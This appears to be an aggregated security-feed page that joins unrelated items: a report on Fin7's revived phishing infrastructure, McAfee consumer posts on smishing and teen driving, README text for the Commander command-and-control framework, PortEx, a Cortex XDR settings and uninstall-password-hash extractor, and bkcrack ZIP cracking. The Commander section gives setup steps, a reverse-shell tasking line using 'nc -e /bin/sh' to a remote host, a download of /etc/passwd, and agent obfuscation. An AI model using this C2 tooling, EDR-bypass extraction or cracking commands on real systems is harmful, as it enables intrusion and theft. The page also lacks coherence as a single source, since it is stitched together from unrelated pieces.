Login
The Russia-based cybercrime group dubbed “Fin7,” known for phishing and malware attacks that have cost victim organizations an estimated $3 billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024 — setting up thousands of websites mimicking a range of media and technology companies — with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
In May 2023, the U.S. attorney for Washington state declared “Fin7 is an entity no more,” after prosecutors secured convictions and prison sentences against three men found to be high-level Fin7 hackers or managers. This was a bold declaration against a group that the U.S. Department of Justice described as a criminal enterprise with more than 70 people organized into distinct business units and teams.
The first signs of Fin7’s revival came in April 2024, when Blackberry wrote about an intrusion at a large automotive firm that began with malware served by a typosquatting attack targeting people searching for a popular free network scanning tool.
Now, researchers at security firm Silent Push say they have devised a way to map out Fin7’s rapidly regrowing cybercrime infrastructure, which includes more than 4,000 hosts that employ a range of exploits, from typosquatting and booby-trapped ads to malicious browser extensions and spearphishing domains.
Silent Push said it found Fin7 domains targeting or spoofing brands including American Express, Affinity Energy, Airtable, Alliant, Android Developer, Asana, Bitwarden, Bloomberg, Cisco (Webex), CNN, Costco, Dropbox, Grammarly, Google, Goto.com, Harvard, Lexis Nexis, Meta, Microsoft 365, Midjourney, Netflix, Paycor, Quickbooks, Quicken, Reuters, Regions Bank Onepass, RuPay, SAP (Ariba), Trezor, Twitter/X, Wall Street Journal, Westlaw, and Zoom, among others.
Zach Edwards, senior threat analyst at Silent Push, said many of the Fin7 domains are innocuous-looking websites for generic businesses that sometimes include text from default website templates (the content on these sites often has nothing to do with the entity’s stated business or mission).
Edwards said Fin7 does this to “age” the domains and to give them a positive or at least benign reputation before they’re eventually converted for use in hosting brand-specific phishing pages.
“It took them six to nine months to ramp up, but ever since January of this year they have been humming, building a giant phishing infrastructure and aging domains,” Edwards said of the cybercrime group.
In typosquatting attacks, Fin7 registers domains that are similar to those for popular free software tools. Those look-alike domains are then advertised on Google so that sponsored links to them show up prominently in search results, which is usually above the legitimate source of the software in question.
A malicious site spoofing FreeCAD showed up prominently as a sponsored result in Google search results earlier this year.
According to Silent Push, the software currently being targeted by Fin7 includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
In May 2024, security firm eSentire warned that Fin7 was spotted using sponsored Google ads to serve pop-ups prompting people to download phony browser extensions that install malware. Malwarebytes blogged about a similar campaign in April, but did not attribute the activity to any particular group.
A pop-up at a Thomson Reuters typosquatting domain telling visitors they need to install a browser extension to view the news content.
Edwards said Silent Push discovered the new Fin7 domains after a hearing from an organization that was targeted by Fin7 in years past and suspected the group was once again active. Searching for hosts that matched Fin7’s known profile revealed just one active site. But Edwards said that one site pointed to many other Fin7 properties at Stark Industries Solutions, a large hosting provider that materialized just two weeks before Russia invaded Ukraine.
As KrebsOnSecurity wrote in May, Stark Industries Solutions is being used as a staging ground for wave after wave of cyberattacks against Ukraine that have been tied to Russian military and intelligence agencies.
“FIN7 rents a large amount of dedicated IP on Stark Industries,” Edwards said. “Our analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure.”
Fin7 once famously operated behind fake cybersecurity companies — with names like Combi Security and Bastion Secure — which they used for hiring security experts to aid in ransomware attacks. One of the new Fin7 domains identified by Silent Push is cybercloudsec[.]com, which promises to “grow your business with our IT, cyber security and cloud solutions.”
The fake Fin7 security firm Cybercloudsec.
Like other phishing groups, Fin7 seizes on current events, and at the moment it is targeting tourists visiting France for the Summer Olympics later this month. Among the new Fin7 domains Silent Push found are several sites phishing people seeking tickets at the Louvre.
“We believe this research makes it clear that Fin7 is back and scaling up quickly,” Edwards said. “It’s our hope that the law enforcement community takes notice of this and puts Fin7 back on their radar for additional enforcement actions, and that quite a few of our competitors will be able to take this pool and expand into all or a good chunk of their infrastructure.”
Further reading:
Stark Industries Solutions: An Iron Hammer in the Cloud.
A 2022 deep dive on Fin7 from the Swiss threat intelligence firm Prodaft (PDF).
Article tags
TEx is a Telegram Explorer tool created to help Researchers, Investigators and Law Enforcement Agents to Collect and Process the Huge Amount of Data Generated from Criminal, Fraud, Security and Others Telegram Groups.
BETA VERSION
Please note that this project has been in beta for a few weeks, so it is possible that you may encounter bugs that have not yet been mapped out.
I kindly ask you to report the bugs at: https://github.com/guibacellar/TEx/issues
Telegram Explorer is available through pip, so, just use pip install in order to fully install TeX.
FreshRSS pip install TelegramExplorerTo upgrade TeX to the latest version, just use pip install upgrade command.
pip install --upgrade TelegramExplorerhttps://telegramexplorer.readthedocs.io/en/latest/
Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required to run and the following dependencies
Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First create the required certs and keys
# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local sqlite db file
python3 admin.py
Continue by running the server
python3 c2_server.py
And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.
As the Operator/Administrator you can use the following commands to control your agents
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P
The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.
More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.
Below is the flow diagram for this case.
To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.
# show all availiable agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval of the agents that checks for tasks to 30 seconds like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, lets select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session like with netcat or metaspolit do the following.
# show all availiable agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.
The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding
Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened
Create new certs in each engagement
Backup your c2.db, it is easy... just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
With the advent of technology and the widespread use of mobile phones, scam calls and texts have become increasingly common. These annoying and invasive attempts to trick you out of your personal information can be frightening and frustrating. They often come in the form of ‘vishing‘ and ‘smishing‘ attacks. But what exactly are these types of scams, and how can you protect yourself against them?
Vishing and smishing are two common methods used by scammers to steal personal information. Vishing, a combination of ‘voice’ and ‘phishing,’ typically involves a scammer calling you and pretending to be from a trusted organization, such as your bank. They may tell you that there has been unusual activity on your account and ask for your personal information to ‘resolve’ the issue.
Smishing, on the other hand, combines ‘SMS’ (text) and ‘phishing.’ In this type of scam, you may receive a text message stating that you have won a prize, or that there is a problem with your account. The message will instruct you to click on a link, which will then try and trick you into providing personal information.
The main strategy of scammers behind vishing and smishing attacks is volume. They send out calls and messages to a large number of phones, hoping that at least a few will fall for the scam. There are several ways these scammers can get bulk phone numbers for their attacks:
Data breaches are a common way for scammers to obtain phone numbers, along with names and email addresses. This information can give them everything they need to launch effective vishing and smishing attacks. While some breaches result in the loss of credit card or government ID numbers, others simply provide basic personal information that can be enough to make their scams seem legitimate.
Another method scammers use to get phone numbers is by purchasing lists from data brokers. These online entities collect and sell detailed information about millions of individuals, including their phone numbers. These lists can be bought for a few dollars with just a few clicks. The data brokers don’t care who they sell to, so even scammers can easily purchase these lists.
→ Dig Deeper: How Data Brokers Sell Your Identity
Scammers often scour social media platforms and online forums to gather personal information, including phone numbers. People sometimes inadvertently share their contact details or other personal information in public posts, comments, or private messages. Scammers exploit these details to build their contact lists.
Scammers may also access publicly available records and directories, such as online phone directories, business listings, or government databases. These sources can provide them with a substantial amount of phone numbers and associated information.
Some scammers use phishing emails or fraudulent online surveys to trick individuals into disclosing their personal information, which can include phone numbers. They may pose as legitimate organizations or institutions, enticing recipients to provide their contact information in the process.
You may have already seen smishing attacks without realizing what they were. Here are a few examples of common smishing scams:
One feature that these messages have in common is that they all include a link. These links often have unusual character strings and web addresses that do not match the supposed sender of the message. This is a clear indication that the message is a scam.
Fortunately, there are steps you can take to protect yourself against these types of scams. Here are a few tips:
Scammers have tools at their disposal that can tamper with caller ID, making it appear as though the call is coming from a trusted organization. Do not rely solely on caller ID to determine the legitimacy of a call or text.
→ Dig Deeper: Be on the Lookout for Scam Tech Support Calls
If you receive a call or text message that seems suspicious, do not provide any personal information. Instead, hang up or ignore the text and contact the organization directly to verify the request.
If you believe you have been the target of a vishing or smishing attack, document the incident and report it to the company it was supposedly from. Many organizations have dedicated fraud reporting tools for this purpose.
As a general rule, avoid clicking on links in text messages, especially if they look suspicious or you do not recognize the sender. If you have concerns, always contact the organization directly.
→ Dig Deeper: The Latest Mobile Scams & How To Stay Safe
There are a number of strategies that you can employ to combat these types of scams. One of the most effective ways is to install comprehensive online protection software like McAfee+ on your phone. This software offers features such as web protection that warns you of suspicious links in texts, search results, and websites you browse. If your personal information appears on the dark web, the software can alert you and provide guidance on how to proceed. It can also help you remove your personal information from data broker sites, reducing your exposure to data breaches and spam calls.
Another strategy is to educate yourself on the telltale signs of a scam call or text. For instance, scammers often use scare tactics or threats to manipulate you into giving up your personal information. If you receive a message that seems to play on your emotions or tries to rush you into action, it’s probably a scam. Legitimate businesses and organizations will not typically resort to such tactics. If in doubt, always contact the organization directly to verify the validity of the message.
Internet service providers and mobile carriers have a crucial role to play in combating vishing and smishing attacks. By implementing advanced security measures, they can help protect their customers from these types of scams. For example, many carriers now offer features such as scam call blocking and identification. These features can help you identify potentially fraudulent calls and texts and avoid falling victim to these scams.
ISPs and mobile carriers can also educate their customers about the risks of vishing and smishing. By providing clear, easy-to-understand information about these scams and how to avoid them, they can empower their customers to protect themselves. As these types of attacks become more sophisticated, the role of ISPs and mobile carriers in combating them will only become more important.
McAfee Pro Tip: Regardless of the nature of these unwelcome calls, there are proactive measures you can take to safeguard yourself and even prevent them from reaching you in the initial instance. Know how to beat and block robocalls.
In conclusion, vishing and smishing are increasingly common types of scams that target individuals through phone calls and text messages. These scams can be frightening and invasive, but by understanding how they work and implementing strategies to protect yourself, you can significantly reduce your risk of being a victim. Comprehensive online protection software, being vigilant to the signs of a scam, and leveraging features offered by your ISP or mobile carrier are all effective ways to combat these scams. Remember, if something doesn’t feel right, it probably isn’t – always contact the organization directly if you’re unsure about a call or text.
The post Those Annoying Scam Calls and Texts: How to Fight Back Against Vishing and Smishing appeared first on McAfee Blog.
Read this statement, then read it again: Just five distracted seconds at 55 mph is equivalent to driving the length of a football field with your eyes closed. This alarming truth from the National Highway Traffic Safety Administration (NHTSA), highlights the need for parents to address the issue of distracted driving with their teens.
Additional distracted driving statistics are mind-blowing. According to the NHSTA, 77 percent of drivers admitted to using their phones while driving, 74 percent used their map app, 56 percent read emails or texts, 27 percent updated or checked their social media accounts, and shockingly, 19 percent of drivers—equivalent to one in five—engaged in online shopping while driving.
In the United States, distracted driving has become a leading cause of fatal crashes, accounting for 25 to 30 percent of all fatal crashes. Furthermore, overall highway fatalities have increased by 22 percent, as reported recently by The Los Angeles Times, which attributed this rise to the allure of technology turning our cars into “candy stores of distraction.”
While technology plays a significant role in distracted driving, other everyday choices and factors can also contribute to accidents. Eating while driving, managing a lively pet in the car, navigating unfamiliar streets, and even talking with peer passengers can distract young drivers. Studies have shown that crash risk doubles when teens drive with one peer passenger and quadruples with three or more teen passengers.
In the throes of summer, it’s a great time for parents to have a conversation with their teen drivers about the dangers of distracted driving and texting while driving. Here are some important topics to discuss and tips to help keep your kids safe on the road:
Remember, developing good (or better) habits takes time, effort, consistency, and parental involvement in teen driving. Preventing distracted driving with positive behavior change won’t happen overnight. Repeat yourself when it comes to road safety without apologies. Giving your child rules and expectations demonstrates love. By making some of these shifts, hopefully, you will worry less, raise wiser drivers, and improve safety for everyone on the roads.
The post Parent’s Guide: 8 Ways to Help Your Teen Combat Distracted Driving appeared first on McAfee Blog.
Article tags
PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
For more information have a look at PortEx Wiki and the Documentation
PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar
The GUI version is available here: PortexAnalyzerGUI
You can include PortEx to your project by adding the following Maven dependency:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>
To use a local build, add the library as follows:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>
Add the dependency as follows in your build.sbt
libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"
PortEx is build with sbt
To simply compile the project invoke:
$ sbt compile
To create a jar:
$ sbt package
To compile a fat jar that can be used as command line tool, type:
$ sbt assembly
You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:
addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")
Generate the project files for Eclipse:
$ sbt eclipse
Import the project to Eclipse via the Import Wizard.
I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel
Karsten Hahn
Twitter: @Struppigel
Mastodon: struppigel@infosec.exchange
Youtube: MalwareAnalysisForHedgehogs
Graphical interface for PortEx, a Portable Executable and Malware Analysis Library
I test this program on Linux and Windows. But it should work on any OS with JRE version 9 or higher.
I will be including more and more features that PortEx already provides.
These features include among others:
Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI
I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel
Karsten Hahn
Twitter: @Struppigel
Mastodon: struppigel@infosec.exchange
Youtube: MalwareAnalysisForHedgehogs
This tool is meant to be used during Red Team Assessments and to audit the XDR Settings.
With this tool its possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.
Usage = ./XDRConfExtractor.py [Filename].ldb
Help = ./XDRConfExtractor.py -h
With Agent Versions prior to 7.8 any authenticated user can generate a Support File on Windows via Cortex XDR Console in the System Tray. The databse lock files can be found within the zip:
logs_[ID].zip\Persistence\agent_settings.db\
Support files from Agents running Version 7.8 or higher are encrypted, but if you have elevated privileges on the Windows Maschine the files can be directly copied from the following directory, without encryption.
C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db\
Generated Support Files are not deleted regulary, so it might be possible to find old, unencrypted Support Files in the following folder:
C:\Users\[Username]\AppData\Roaming\PaloAltoNetworks\Traps\support\
Supposedly, since Agent version 8.1, it should no longer be possible to pull the data from the lock files. This has not been tested yet.
This tool relies on a technique originally released by mr.d0x in April 2022 https://mrd0x.com/cortex-xdr-analysis-and-bypass/
Usage of Cortex-XDR-Config-Extractor for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based Encryption Algorithm symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed to the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bits integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of nl-6 where n is the size of the character set and l is the length of the password.
bkcrack is a command-line tool which implements this known plaintext attack. The main features are:
You can get the latest official release on GitHub.
Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.
On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.
Alternatively, you can compile the project with CMake.
First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.
cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install
bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.
You can see a list of entry names and metadata in an archive named archive.zip like this:
bkcrack -L archive.zip
Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.
The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.
Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:
bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain
Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:
bkcrack -c cipherfile -p plainfile
If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.
bkcrack -c cipherfile -p plainfile -o offset
If you know little contiguous plaintext (between 8 and 11 bytes), but know some bytes at some other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.
bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21
If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.
If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:
bkcrack -c cipherfile -p plainfile -d decipheredfile
If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:
bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile
The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.
python3 tools/inflate.py < decipheredfile > decompressedfile
It is also possible to generate a new encrypted archive with the password of your choice:
bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password
The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.
Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:
bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p
You can be more specific by specifying a minimal password length:
bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p
A tutorial is provided in the example folder.
For more information, have a look at the documentation and read the source.
Do not hesitate to suggest improvements or submit pull requests on GitHub.
This project is provided under the terms of the zlib/png license.
act-1200
Article tags
Your phone buzzes. You hope it’s a reply from last night’s date, but instead you get an entirely different swooping feeling: It’s an alarming SMS text alerting you about suspicious activity on your bank account and that immediate action is necessary.
Take a deep breath and make sure to read the message carefully. Luckily, your assets could be completely safe. It could just be a smisher.
Smishing, or phishing over SMS, is a tactic where cybercriminals impersonate reputable organizations or people and trick people into handing over their personally identifiable information (PII) or financial details. Sometimes they can seem very credible with the information they have, and you may have even been expecting a correspondence of a similar nature.
So how can you tell when an SMS text is real and requires your attention? And how should you deal with a smisher to keep your identity safe?
Like email phishing and social media phishing, SMS text phishing often tries to use a strong emotion – like fear, anger, guilt, or excitement – to get you to respond immediately and without thinking through the request completely. Vishing is another phishing tactic over the phone, though instead of a text, the scammer leaves voicemails.
In the case of one coordinated smishing attack, cybercriminals not only impersonated financial institutions but collected PII on their targets ahead of time. The criminals then used these personal details – like old addresses and Social Security Numbers – to convince people that they were legitimate bank employees.1 But since when does a bank try to prove itself to the customer? Usually, it’s the other way around, where they’ll ask you to confirm your identity. Be wary of anyone who texts or calls you and has your PII. If you’re ever suspicious of a caller or texter claiming they’re a financial official, contact your bank through verified channels (chat, email, or phone) you find on the bank’s website to make sure.
Scammers also keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. This adds false legitimacy to their message. For example, in the summer of 2022, Rogers Communications, a Canadian telecommunications provider, experienced an extended loss of service and told customers they could expect a reimbursement. Smishers jumped on the opportunity and sent a barrage of fake texts requesting banking details in order to carry out the reimbursement.2 However, Rogers credited customers directly to their Rogers accounts.
If you receive a suspicious text, go through these three steps to determine if you should follow up with the organization in question or simply delete and report the text.
Do you have text alerts enabled for your bank and utility accounts? If not, disregard any text claiming to be from those organizations. Companies will only contact you through the channels you have approved. Also, in the case of the Rogers smishing scheme, be aware of how a company plans to follow up with customers regarding reimbursements. You can find information like this on their official website and verified social channels.
ChatGPT might make it more difficult than spot smishing attempts because AI content generation tools usually use correct grammar and spelling. However, the tone is a good indicator of a scammer. If the tone of the text urges you to act quickly or proposes a dire consequence of ignoring the message, be on alert. While suspicious activity on your credit card is serious, your bank will likely reimburse you for charges you didn’t make, so you have time to check your bank account and see recent activities. Official correspondence from financial institutions will always be professional and will try to put you at ease, not make you panic.
Whenever you get a text from someone you don’t know, it’s a good practice to do an internet search for the number to see with whom it’s associated. If it’s a legitimate number, it should appear on the first page of the search results and direct to an official bank webpage.
Once you’ve identified a fake SMS alert, do not engage with it. Never click on any links in the message, as they can redirect you to risky sites or download malware to your device. Also, don’t reply to the text. A reply lets the criminal on the other end know that they reached a valid phone number, which may cause them to redouble their efforts. Finally, block the number and report it as spam.
A great absolute rule to always follow is to never give out your Social Security Number, banking information, usernames, or passwords over text.
To give you peace of mind in cases where you think a malicious actor has access to your PII, you can count on McAfee+. McAfee+ offers a comprehensive suite of identity and privacy protection services to help you feel more confident in your digital life.
1PC Mag, “Scammers Are Using Fake SMS Bank Fraud Alerts to Phish Victims, FBI Says”
2Daily Hive, “Rogers scam alert: Texts offering credit after outage are fake”
The post What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe appeared first on McAfee Blog.
Article tags
